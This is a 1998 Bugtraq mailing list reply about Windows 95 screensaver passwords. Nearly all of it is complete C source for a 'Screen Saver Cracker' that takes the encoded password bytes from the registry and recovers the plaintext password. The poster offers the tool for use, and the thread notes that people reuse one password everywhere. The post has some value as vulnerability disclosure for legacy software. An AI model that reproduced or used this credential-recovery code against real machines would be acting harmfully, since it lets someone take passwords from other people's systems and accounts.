[6860] in bugtraq
Re: Windows95/98(?) Screensavers
daemon@ATHENA.MIT.EDU (Ryan Veety)
Fri May 29 14:21:57 1998
Date: Thu, 28 May 1998 12:59:40 -0400
Reply-To: Ryan Veety <ryan@RYANSPC.COM>
From: Ryan Veety <ryan@RYANSPC.COM>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: CrazyLinux <kmspill_km@INAME.COM> "Windows95/98(?) Screensavers"
(May 26, 11:31pm)
On May 26, 11:31pm, CrazyLinux wrote:
> Subject: Windows95/98(?) Screensavers
>
> I got the idea to explore a bit on the w95ss password in the registry
> after seeing the bruteforce cracker (using tables of bytes).
>
> (why this is important to bugtraq? loads of people use 1 password for
> everything)
>
> Feel free to recode it in C and post to the list.
>-- End of excerpt from CrazyLinux
I made this sometime a few months ago, it works.
I did not write the original code, I only modified it so the values from
RegEdit could be entered.
------------------ CUT HERE -------------------------
// Original code by Lonely Hawk
// Modified by Ryan Veety to support both RegEdit and text editor codes.
// http://www.ryanspc.com
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
unsigned char matrix[256+2];
unsigned char matrixok[256+2];
unsigned char mystery[4]={ 0xb2, 0xdc, 0x90, 0x8f };
unsigned char h1;
unsigned char pa[79], passwd[80];
unsigned char tofind[30];
int h2=4;
unsigned int lentofind;
int len;
void fixmatrix()
{
unsigned char orig, mys, help1, last;
int i,j, help2;
for(i=0; i<256; i++)
matrix[i]=i;
matrix[256]=0; matrix[256+1]=0;
h1=0; last=0;
for(j=0;j<256;j++) {
orig=matrix[j];
mys=mystery[h1];
help2=(mys+last+matrix[j]) & 0xff;
help1=matrix[help2];
matrix[j]=help1;
matrix[help2]=orig;
last=help2;
h1++; h1=h1%4;
}
memcpy(matrixok, matrix, sizeof(matrix));
}
void check(char *test)
{
unsigned char help1, oldh2;
int i;
strcpy(passwd, test);
strcpy(pa, passwd);
len=strlen(pa);
memcpy(matrix, matrixok, sizeof(matrix));
h1=0; h2=0;
for(i=0;i<len;i++)
{
h1++; h1=h1&0xff;
oldh2=matrix[h1];
h2=(h2+matrix[h1]) & 0xff;
help1=matrix[h1];
matrix[h1]=matrix[h2];
matrix[h2]=help1;
help1=(matrix[h1]+oldh2) & 0xff;
help1=matrix[help1];
pa[i]^=help1;
}
}
int is_ok(char a)
{
if ((a<='9') && (a>='0'))
return 1;
else if ((a<='F') && (a>='A'))
return 1;
else
return 0;
}
int nibble(char c)
{
if((c>='A') && (c<='F'))
return (10+c-'A');
else if((c>='0') && (c<='9'))
return (c-'0');
}
void parse(char *inpt)
{
char *tok;
char num[2];
lentofind=0;
tok=strtok(inpt, "\t ,\n");
while(tok!=NULL) {
num[0]=tok[0]; num[1]=tok[1];
if ((!is_ok(num[0])) || (!is_ok(num[1])))
{
puts("Please input strings like: a1,b1,05,c3,d2,f3");
exit(0);
}
tofind[lentofind++]=16*nibble(num[0])+nibble(num[1]);
tok=strtok(NULL, "\t ,\n");
}
tofind[lentofind]=0;
}
int hex(char *str)
{
return (str[0]-'0')*16+(str[1]-'0');
}
void main()
{
unsigned int i;
int j,found=0,n=0,odd=0;
unsigned char tst[80];
char inpt[120];
char ascii[120];
char temp[3];
char ans;
fixmatrix();
printf("Windows 95 Screen Saver Cracker.\nMade by Lonely Hawk.\n");
printf("Modified by Ryan Veety http://ryanspc.nws.net\n");
printf("It now allows both hex and ascii inputs.\n");
printf("Ascii codes come from RegEdit and hex codes come from a text
editor\n\n");
do
{
printf("Are the codes hex or ascii [h/a]?");
ans = getchar();
getchar();
} while(tolower(ans) != 'h' && tolower(ans) != 'a');
if(tolower(ans) == 'a')
{
printf("Give me the codes, separated by commas (in ascii):\n >");
gets(ascii);
i=0;
do
{
temp[0]=ascii[i];
temp[1]=ascii[i+1];
temp[2]=NULL;
inpt[n]=hex(temp);
n++;
odd++;
if(odd % 2 == 0 && i+3<=strlen(ascii))
{
inpt[n]=',';
n++;
}
i+=3;
}while(i<=strlen(ascii));
inpt[n]=NULL;
printf("The hex codes for the password are: %s\n", inpt);
}
else
{
printf("Give me the codes, separated by commas (in hex):\n >");
gets(inpt);
}
for(i=0;i<strlen(inpt);i++)
inpt[i]=toupper(inpt[i]);
parse(inpt);
for(i=0; i<lentofind; i++)
tst[i]='A';
tst[lentofind]=0;
for(i=0; i<lentofind; i++)
{
for(j=' '; j<='Z'; j++)
{
tst[i]=j;
check(tst);
if(pa[i]==tofind[i])
break;
}
}
printf("Password is: %s\n", tst);
}
--------------------- CUT HERE ---------------------------
--
